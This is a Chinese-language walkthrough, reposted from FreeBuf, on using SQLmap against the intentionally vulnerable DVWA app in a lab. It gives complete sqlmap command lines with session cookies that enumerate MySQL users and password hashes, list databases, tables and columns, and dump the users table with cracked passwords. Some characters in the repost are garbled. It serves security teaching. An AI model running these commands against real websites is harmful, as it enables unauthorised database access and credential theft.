SQL注入之SQLmap入门(转自freebuf)

具体见: http://www.freebuf.com/articles/web/29942.html

用户手册：

http://drops.wooyun.org/tips/143
http://drops.wooyun.org/tips/401

什么是SQLmap？

SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具，有一个很是棒的特性，即对检测与利用的自动化处理（数据库指纹、访问底层文件系统、执行命令）。

读者能够经过位于SourceForge的官方网站下载SQLmap源码：http://sourceforge.net/projects/sqlmap/

SQLmap的做者是谁？

Bernardo DameleAssumpcao Guimaraes (@inquisb)，读者能够经过bernardo@sqlmap.org与他取得联系，以及Miroslav Stampar (@stamparm)读者能够经过miroslav@sqlmap.org与他联系。

同时读者也能够经过dev@sqlmap.org与SQLmap的全部开发者联系。

执行SQLmap的命令是什么？

进入sqlmap.py所在的目录，执行如下命令：

#python sqlmap.py -h

（译注：选项列表太长了，并且与最新版本有些差别，因此这里再也不列出，请读者下载最新版在本身机器上看吧）

SQLmap命令选项被归类为目标（Target）选项、请求（Request）选项、优化、注入、检测、技巧（Techniques）、指纹、枚举等。

如何使用SQLmap：

为方便演示，咱们建立两个虚拟机：

一、受害者机器， windows     XP操做系统，运行一个web服务器，同时跑着一个包含漏洞的web应用（DVWA）。

二、攻击器机器，使用Ubuntu     12.04，包含SQLmap程序。

本次实验的目的：使用SQLmap获得如下信息：

三、枚举MYSQL用户名与密码。

四、枚举全部数据库。

五、枚举指定数据库的数据表。

六、枚举指定数据表中的全部用户名与密码。

使用SQLmap以前咱们获得须要当前会话cookies等信息，用来在渗透过程当中维持链接状态，这里使用Firefox中名为“TamperData”的add-on获取。

当前获得的cookie为“security=high;PHPSESSID=57p5g7f32b3ffv8l45qppudqn3″。

为方便演示，咱们将DVWA安全等级设置为low：

接下来咱们进入页面的“SQL Injection”部分，输入任意值并提交。能够看到get请求的ID参数以下：

“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”

所以该页面就是咱们的目标页面。

如下命令能够用来检索当前数据库和当前用户：

“./sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -b –current-db –current-user”

使用选项：

一、–cookie : 设置咱们的cookie值“将DVWA安全等级从high设置为low”

二、-u : 指定目标URL

三、-b : 获取DBMS banner

四、–current-db : 获取当前数据库

五、–current-user:获取当前用户

结果以下：

能够看到结果以下：

DBMS : MySQLversion 5.0 OS versionUbuntu 12.04 current user:root current db :DVWA

如下命令用来枚举全部的DBMS用户和密码hash，在之后更进一步的攻击中能够对密码hash进行破解：

“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” --string=”Surname” --users --password”

使用选项：

一、–string : 当查询可用时用来匹配页面中的字符串

二、–users : 枚举DBMS用户

三、–password : 枚举DBMS用户密码hash

结果以下：

databasemanagement system users [142]: [*] ”@’kingasmk’ [*]”@’localhost’ [*]‘debian-sys-maint’@'localhost’ [*]‘phpmyadmin’@'localhost’ [*]‘root’@’127.0.0.1′ [*] ‘root’@'::1′ [*]‘root’@'kingasmk’ [*]‘root’@'localhost’

数据库管理系统用户和密码hash：

[*]debian-sys-maint [1]: password hash:*C30441E06530498BC86019BF3211B94B3BAB295A [*] phpmyadmin[1]: password hash:*C30441E06530498BC86019BF3211B94B3BAB295A [*] root [4]: password hash: *C30441E06530498BC86019BF3211B94B3BAB295A password hash:*C30441E06530498BC86019BF3211B94B3BAB295A password hash:*C30441E06530498BC86019BF3211B94B3BAB295A password hash:*C30441E06530498BC86019BF3211B94B3BAB295A

读者可使用Cain&Abel、John&Ripper等工具将密码hash破解为明文。如下命令会枚举系统中全部的数据库schema：

“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” --dbs”

使用选项：

• –dbs: 枚举DBMS中的数据库

结果以下：

availabledatabases [5]: [*]dvwa [*]information_schema [*]mysql [*]performance_schema [*]phpmyadmin

下面咱们尝试枚举DVWA数据表，执行如下命令：

“sqlmap.py-u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -D dvwa --tables”

使用选项：

一、-D : 要枚举的DBMS数据库

二、–tables     : 枚举DBMS数据库中的数据表

获得结果以下：

Database: dvwa [2 tables] +————+ | guestbook | | users | +————+

下面获取用户表的列，命令以下：

 “sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -D dvwa -T users --columns”

使用选项：

• -T : 要枚举的DBMS数据库表

• –columns : 枚举DBMS数据库表中的全部列

结果以下：

Database: dvwa Table: users [6 columns] +————+————-+ | Column | Type| +————+————-+ | avatar |varchar(70) | | first_name |varchar(15) | | last_name |varchar(15) | | password |varchar(32) | | user |varchar(15) | | user_id |int(6) | +————+————-+

如上所示，以上为咱们感兴趣的列，表示用户名与密码等。下面将每一列的内容提取出来。执行如下命令，将用户与密码表中的全部用户名与密码dump出来：

“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”–cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -D dvwa -T users-C user,password --dump”

使用选项：

• -T : 要枚举的DBMS数据表

• -C: 要枚举的DBMS数据表中的列

• –dump : 转储DBMS数据表项

SQLmap会提问是否破解密码，按回车确认：

获得全部用户名与明文密码以下：

Database: dvwa Table: users [5 entries] +———+———+———————————————+ | user_id | user| password | +———+———+———————————————+ | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99(password) | | 2 | gordonb |e99a18c428cb38d5f260853678922e03 (abc123) | | 3 | 1337 |8d3533d75ae2c3966d7e0d4fcc69216b (charley) | | 4 | pablo |0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | | 5 | smithy |5f4dcc3b5aa765d61d8327deb882cf99 (password) | +———+———+———————————————+

这时咱们就能够利用admin账户登陆作任何事了。

总结：

SQLmap是一个很是强大的工具，能够用来简化操做，并自动处理SQL注入检测与利用。

[via infosecinstitute]

________________________________________________________________________

DVWA: http://www.dvwa.co.uk/  (源码在github上)

其中几个测试示例:

python ./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=74ota3rnnjhv6nb7hp8qbkfom6" -b --current-db --current-user

python ./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=74ota3rnnjhv6nb7hp8qbkfom6" --string="Surname" --users --password

python ./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=74ota3rnnjhv6nb7hp8qbkfom6" -D dvwa --tables

python ./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=74ota3rnnjhv6nb7hp8qbkfom6" -D dvwa -T users --columns

python ./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=74ota3rnnjhv6nb7hp8qbkfom6" -D dvwa -T users-C user,password --dump

________________________________________________________________________

仍是用BT5吧, windows底下不舒服